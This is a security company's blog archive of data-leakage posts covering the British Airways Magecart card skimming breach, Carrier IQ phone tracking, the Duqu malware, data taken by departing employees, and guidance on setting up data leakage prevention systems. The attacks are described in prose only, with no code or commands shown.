Archive for category Data Leakage

British Airways faces Data Breach of 380,000 Accounts

A malicious JavaScript code had been planted within British Airway’s website, leading to data breach of around 380,000 accounts.

 

 

RELEASE DATE: September 14th, 2018

 

 

INCIDENT

 

 

Starting from August 21st, around 380,000 accounts have been compromised in a major data breach of British Airways, revealing customers’ information. Cybersecurity organization RiskIQ believes that the Magecart attackers were involved in the breach, who have previously been associated with the Ticketmaster UK breach, earlier this year.

 

The attackers were successful in obtaining names, street and email addresses, credit card numbers, expiry dates and security codes of the airline’s customers, which could potentially lead to theft from user accounts.

 

British Airways informed that all the payment information processed through the airline’s website and mobile app between August 21st and September 5th had been exposed.

 

 

ATTACK VECTOR

 

 

The evidence reveals that a malicious JavaScript code had been planted within British Airway’s website.

 

Magecart has traditionally stolen data by injecting the malicious script into payment forms.

 

RiskIQ further informed that hackers used only 22 lines of code to get a hold of the data. (attached below)

 

 

 

The attack compromised British Airways’ own Web server, making it a highly targeted attack that aimed for this particular website and its mobile Application.

 

“This skimmer is attuned to how British Airways’ payment page is set up, which tells us that the attackers carefully considered how to target this site in particular.” Yonathan Klijnsma, head researcher at RiskIQ said.

 

 

ROOT CAUSE

 

 

The Magecart’s association with the attack was identified because the attack is web-based and targeting credit card data. The attackers focused on the unique site structure and functionality of the British Airways website and exploited their security lapses. RiskIQ crawled the scripts on the British Airways’ site and traced how they changed over time. During the process, the researchers found a modified script in the compromised site.

 

The BA site is found to be utilizing a JavaScript library called an API, on a malicious Web server at baways.com. It’s a virtual private server hosted by a provider in Lithuania, using a TS certificate registered through Comodo (to appear legitimate) on August 15. The code was injected through the JavaScript library.

 

When a customer enters information on the website’s payment form and clicks “submit”, the 22-lines of code export the entered data to the malicious server as a JSON object.

 

The customer’s transaction is not disturbed and appears to be over a secure session while the attackers receive a full copy of the payment information. The attackers also added a “touchend” callback to the script, extending the attack to BA’s mobile App as well, which also called the same modified script.

 

 

LESSON LEARNED

 

 

The British Airways website seems to be operating without visibility into its Internet-facing web assets. Therefore, the British Airways could not detect this compromise and data breach until it was too late.

 

With so many attack vectors and ever-increasing techniques of cyber-attacks, organizations should make sure that they have an intact cybersecurity implementation. With proper measures, visibility and regular penetration testing, such attacks can be nipped in the bud before they cause any damage.

 


Carrier IQ

Carrier IQ also known as CIQ is a software that is installed not only on smartphones but also on tablets. Carrier IQ was developed to reduce the number of dropped calls, extend battery life and for the device and services to work efficiently at all times which will actually help understand the experience of mobile users. Operators want to develop and enhance the services all the time and this can only be done by knowing when exactly the mobile user is having a bad experience.

Historically operators use their network to solve problems but today’s network and devices are too complex to understand if you can’t see the device itself.  Carrier IQ examines a large amount of data from each device to capture and summarize what exactly is working and what is not. For example, the operators and the device manufacturers need to know where exactly was a call dropped or which applications drained the battery life of the device and most importantly they need to know how to solve the user’s problems when you call them.

Carrier IQ’s technology counts and summarizes problems. According to CIQ, it is not providing key strokes or tracking tools.  Carrier IQ’s technology is the user’s advocate because operators and handset manufacturers, for the first time are getting an understanding of the users day to day problems.

Developers, on the other hand, believe that CIQ is a low level software that is installed by Samsung and HTC at the command of the mobile carrier such as AT&T. According to them, it basically records metrics i.e. every key that is pressed, every touch on the screen, every application launched, every website visited or any kind of traffic entering or leaving the phone or every time the battery is changed, etc.

Carrier IQ calls this software the Mobile Intelligence Platform (MIP). CIQ works with mobile manufacturers such as Samsung and HTC to embed the agent within the Smartphone to track all the data. The biggest issue behind CIQ is the threat to privacy since the software works in a similar manner to a spyware.

Carrier IQ has recently gotten immense attention of the public. With growing concerns of threat to the privacy of users, CIQ is facing a lot of pressure not only from the general public but also has lawsuits filed against their software. Developers are coming up with new ways of disabling the software according to the wish of the users allowing them to control exactly what information they are willing to share.


The Mystery of Duqu

Duqu is a sophisticated malware that was discovered on September 1st, 2011. Some experts claim that Duqu could only have been created by creators of the Stuxnet because nobody else could have the source code to create such a sophisticated malware that is identical to Stuxnet but serves an entirely different purpose as a malware. The three major similarities that have been come to attention between Stuxnet and Duqu are firstly, the components that are signed is done through stolen certificates. Secondly, similar to Stuxnet, Duqu uses a zero-day vulnerability to attack Windows system and lastly, the way Duqu is targeted it requires advanced intelligence to operate it again similar to Stuxnet.

Highlighted few weeks ago by Symantec, researchers have discovered how Duque infects the targeted computers. The malware hides in a Word file (. doc) sent through email to the victims. Once opened, it exploits an 0-day vulnerability in the Windows kernel to execute code and infects the system through service.exe. The infected computers can then be remotely controlled by attackers, who can spread the malware on the network and retrieve data in the process. Symantec issued a diagram summarizing the performance of the intrusion.

With this new discovery, security researchers are now confident that Duqu is designed to address specific high profile critical infrastructures via Word documents designed to look legitimate. Symantec has identified six organizations contaminated in 8 countries: Iran, Sudan, Vietnam, India, France, the Netherlands, Switzerland and Ukraine. To which is added a list of identifications made by other experts in Austria, Hungary, Indonesia and the United Kingdom.

If Duqu starts attacking Pakistani networks, Pakistan would face a huge threat regardless of the existing on-going cyber war between Pakistan and India. Duqu, on the other hand, is a much more powerful malware which if targeted towards Pakistani networks, it could collect intelligence data and assets from high profile entities, with the purpose of conducting a future attack without much effort against additional third parties.

Today remains to be seen whether future changes made by Microsoft will be sufficient to stem the problem. At present, the source of Duqu has not yet been identified. Many measures may be taken to prevent this situation from reaching a system. It is important to have a backup of all exiting data but even more importantly since Duqu is a powerful malware the best way to prevent any potential attacks from it is by protecting and securing critical infrastructure networks from such threats. Microsoft has finally patched the flaw being exploited by the Duqu.

Moreover, a recent discovery was made which states that Duqu has shut down all operations and has cleaned up all their commands leaving security experts almost no evidence for their further research. According to Kaspersky Lab, Duqu has been active since 2007 and was only discovered in October 2011 which proves that several systems might have been infected with the Duqu since years and possibly still not detected.

A further discovery was made that Duqu undertook a global clean on October 20th which cleaned up all their activities since the year 2009 as a result leaving almost no trace of their existence throughout these years. This goes to prove that the aim of attackers behind Duqu was to keep it a secret and as soon as the word got out it was banished. Even now the command & control (C&C) servers behind Duqu remain undiscovered which only goes to show the capability and power of the attackers behind this malware.

Experts were able to point out that servers were hacked through brute-forcing the root password rather than the believed zero-day theory and as soon as the attackers gained control over the servers they upgraded OpenSSH 4.3 to version 5.8 which explains that the newer version of the software must hold such importance.


Fired Employees Leaving With More Than Just Experience

With rampant downsizing in most organizations, corporations now face new frontiers in their efforts in keeping their data secured.

Uncertainty amongst employees leads to more dubious behavior. With most of today’s security products designed to counter external threats, how do you keep the EVIL WITHIN from jeopardizing your security and compromising the sanctity of your data?

Recent surveys conducted by (but not limited to) Symantec and Ponemon indicate that employee exodus has also resulted in tons of sensitive data being leaked out as well. The survey conducted around a thousand participants revealed that an overwhelming majority of employees took a copy of their work with them. According to the survey, CDs remained the most popular mode of sneaking out data with confessions from 53 percent of the participants. Next inline were USBs which had been used by another 43 % while 38% said that they had used Email.

While the more benign of the lot may just keep it as apart of their memory, the more enterprising may have other wily ideas.

, ,


A Matter of Trust

Another commonly raised point related to DLPs, usually by indignant employees is “don’t you trust us?”

It is necessary to elaborate that implementation of a DLP does not necessarily imply lack of trust in employees, in fact it’s there to prevent against any accidental losses. Studies analyzing recent data leakages indicate that a vast majority of disclosures are unintentional and may be attributed to the lack of awareness amongst employees. A majority of instances of leakage scenarios can be traced back to lost USB storage devices or stolen laptops. Social networking sites, blogs and the increasing use of wikis is contributing to incidences of both incidental and intentional leakages.

It is under these scenarios that the implementation of a DLP starts to make sense, prevent malpractices, before they can actually hurt.

, , , , , ,


Guidelines for Setting Up a DLP

Planning to set up a Data Leakage Prevention (DLP) system for your company? With DLP systems costing as much as they do, its common for security managers to think of these new contraptions as the elixir of all their headaches.

Just before you start attaching too much expectations to your DLP, its better to get an insight of what a DLP system is capable of – and more importantly what its not capable of.

DLP is essentially  targeted at risk reduction, not truly elimination of threats. System admins have to be careful of the nature of security they are deploying, misdirected policies are likely either raise too many false alarms or too little.
Identify your sensitivity areas, categorize possible threats based on your organizational structure. While it may not be very alarming to have some one from the HR to have a list of all your employees, the same list in the hands of someone from, say, the marketing department should be very alarming. Whereas an attempt to copy or email the same from anyone should automatically trigger an alarm.

Hence simpler the policies, the more effectively your system reacts, for example, address personal info of employees in one rule, another for customer credentials, yet another to deal with pricing archives.

Once you have your policies defined, its time to test them and make some fine adjustments as well to optimize your response. One of the biggest hurdles to an effective implementation of a DLP is improperly defined user groups. In a system that relies heavily on your classification of users on the basis of their priveliges, it’s important that you keep the directory structure as straight forward as possible.

And finally, one thing that we can’t emphasize enough on, is to test, test and retest your DLP configurations, these will truly let you gauge the capability of your DLP installation.

, , , , , ,


Copyright © Rewterz. All rights reserved.